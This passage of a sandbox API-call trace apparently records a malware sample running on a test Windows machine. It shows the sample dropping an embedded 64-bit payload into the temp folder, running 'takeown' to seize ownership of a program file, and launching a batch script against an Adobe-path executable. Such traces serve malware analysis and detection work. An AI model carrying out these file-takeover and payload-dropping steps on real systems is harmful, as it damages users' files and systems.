\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0233.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8bîfzäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0233.279] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x80) returned 0x598248 [0233.279] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0233.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0233.279] RtlSizeHeap (HeapHandle=0x580000, Flags=0x0, MemoryPointer=0x598248) returned 0x80 [0233.279] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0233.279] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0233.279] GetCurrentProcess () returned 0xffffffff [0233.279] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0233.279] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0233.280] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0233.280] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0233.280] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0233.280] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0233.280] LockResource (hResData=0x43c648) returned 0x43c648 [0233.280] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x5982d0 [0233.280] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.281] GetLastError () returned 0x20 [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] GetLastError () returned 0x20 [0233.281] SetLastError (dwErrCode=0x20) [0233.281] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x1000) returned 0x599828 [0233.282] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0233.283] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x597818 | out: hHeap=0x580000) returned 1 [0233.283] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0233.283] ExitProcess (uExitCode=0x1) [0233.283] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5960d0 | out: hHeap=0x580000) returned 1 Process: id = "245" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1859e000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0xad4" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 844 os_tid = 0xacc Thread: id = 855 os_tid = 0x3c4 Process: id = "246" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29db8000" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 850 os_tid = 0xae4 [0238.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f8b4 | out: lpSystemTimeAsFileTime=0x32f8b4*(dwLowDateTime=0x445bc0e0, dwHighDateTime=0x1d68287)) [0238.999] GetCurrentProcessId () returned 0xad0 [0238.999] GetCurrentThreadId () returned 0xae4 [0238.999] GetTickCount () returned 0x11669cb [0238.999] QueryPerformanceCounter (in: lpPerformanceCount=0x32f8ac | out: lpPerformanceCount=0x32f8ac*=35933796128) returned 1 [0239.002] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0239.002] __set_app_type (_Type=0x1) [0239.002] __p__fmode () returned 0x770331f4 [0239.002] __p__commode () returned 0x770331fc [0239.002] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0239.002] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0239.003] GetCurrentThreadId () returned 0xae4 [0239.003] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xae4) returned 0x60 [0239.003] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0239.003] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0239.003] SetThreadUILanguage (LangId=0x0) returned 0x409 [0239.004] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0239.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f844 | out: phkResult=0x32f844*=0x0) returned 0x2 [0239.004] VirtualQuery (in: lpAddress=0x32f87b, lpBuffer=0x32f814, dwLength=0x1c | out: lpBuffer=0x32f814*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0239.004] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f814, dwLength=0x1c | out: lpBuffer=0x32f814*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0239.004] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f814, dwLength=0x1c | out: lpBuffer=0x32f814*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0239.004] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f814, dwLength=0x1c | out: lpBuffer=0x32f814*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0239.004] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f814, dwLength=0x1c | out: lpBuffer=0x32f814*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0239.004] GetConsoleOutputCP () returned 0x1b5 [0239.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0239.005] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0239.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.005] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0239.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0239.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.006] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0239.006] _get_osfhandle (_FileHandle=0) returned 0x3 [0239.006] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0239.007] _get_osfhandle (_FileHandle=0) returned 0x3 [0239.007] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0239.007] GetEnvironmentStringsW () returned 0x5020d8* [0239.007] GetProcessHeap () returned 0x4f0000 [0239.007] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x502bb0 [0239.008] FreeEnvironmentStringsW (penv=0x5020d8) returned 1 [0239.008] GetProcessHeap () returned 0x4f0000 [0239.008] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x501878 [0239.008] GetEnvironmentStringsW () returned 0x5020d8* [0239.008] GetProcessHeap () returned 0x4f0000 [0239.008] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x503688 [0239.008] FreeEnvironmentStringsW (penv=0x5020d8) returned 1 [0239.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e7b4 | out: phkResult=0x32e7b4*=0x68) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x0, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x1, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x1, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x0, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x40, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x40, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x40, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.009] RegCloseKey (hKey=0x68) returned 0x0 [0239.009] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e7b4 | out: phkResult=0x32e7b4*=0x68) returned 0x0 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x40, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.009] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x1, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.010] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x1, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.010] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x0, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.010] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x9, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.010] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x4, lpData=0x32e7c0*=0x9, lpcbData=0x32e7b8*=0x4) returned 0x0 [0239.010] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e7bc, lpData=0x32e7c0, lpcbData=0x32e7b8*=0x1000 | out: lpType=0x32e7bc*=0x0, lpData=0x32e7c0*=0x9, lpcbData=0x32e7b8*=0x1000) returned 0x2 [0239.010] RegCloseKey (hKey=0x68) returned 0x0 [0239.010] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e305 [0239.010] srand (_Seed=0x5f51e305) [0239.010] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"\"" [0239.010] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files (x86)\\Adobe\\accupos.exe\"\"" [0239.011] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.012] GetProcessHeap () returned 0x4f0000 [0239.012] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x5020d8 [0239.012] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5020e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0239.012] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0239.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.012] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0239.013] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0239.013] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0239.013] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0239.013] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0239.013] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0239.013] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0239.013] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0239.013] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0239.013] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0239.013] GetProcessHeap () returned 0x4f0000 [0239.013] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502bb0 | out: hHeap=0x4f0000) returned 1 [0239.013] GetEnvironmentStringsW () returned 0x5022f0* [0239.013] GetProcessHeap () returned 0x4f0000 [0239.013] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xae2) returned 0x504c50 [0239.013] FreeEnvironmentStringsW (penv=0x5022f0) returned 1 [0239.013] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.013] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0239.014] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0239.014] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0239.014] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0239.014] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0239.014] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0239.014] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0239.014] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0239.014] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0239.014] GetProcessHeap () returned 0x4f0000 [0239.014] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5017a8 [0239.014] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f580 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f580, lpFilePart=0x32f57c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f57c*="Desktop") returned 0x25 [0239.014] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0239.014] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f2fc | out: lpFindFileData=0x32f2fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x505740 [0239.014] FindClose (in: hFindFile=0x505740 | out: hFindFile=0x505740) returned 1 [0239.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f2fc | out: lpFindFileData=0x32f2fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x505740 [0239.015] FindClose (in: hFindFile=0x505740 | out: hFindFile=0x505740) returned 1 [0239.015] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0239.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f2fc | out: lpFindFileData=0x32f2fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x505740 [0239.015] FindClose (in: hFindFile=0x505740 | out: hFindFile=0x505740) returned 1 [0239.015] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0239.015] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0239.015] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0239.015] GetProcessHeap () returned 0x4f0000 [0239.015] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504c50 | out: hHeap=0x4f0000) returned 1 [0239.015] GetEnvironmentStringsW () returned 0x504160* [0239.015] GetProcessHeap () returned 0x4f0000 [0239.015] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x505f80 [0239.016] FreeEnvironmentStringsW (penv=0x504160) returned 1 [0239.016] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.016] GetProcessHeap () returned 0x4f0000 [0239.016] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5017a8 | out: hHeap=0x4f0000) returned 1 [0239.016] GetProcessHeap () returned 0x4f0000 [0239.016] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x506ac0 [0239.016] GetProcessHeap () returned 0x4f0000 [0239.016] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xd0) returned 0x502e30 [0239.016] GetProcessHeap () returned 0x4f0000 [0239.017] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50aad8 [0239.017] GetProcessHeap () returned 0x4f0000 [0239.017] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50eae8 [0239.017] GetProcessHeap () returned 0x4f0000 [0239.017] HeapFree (in: 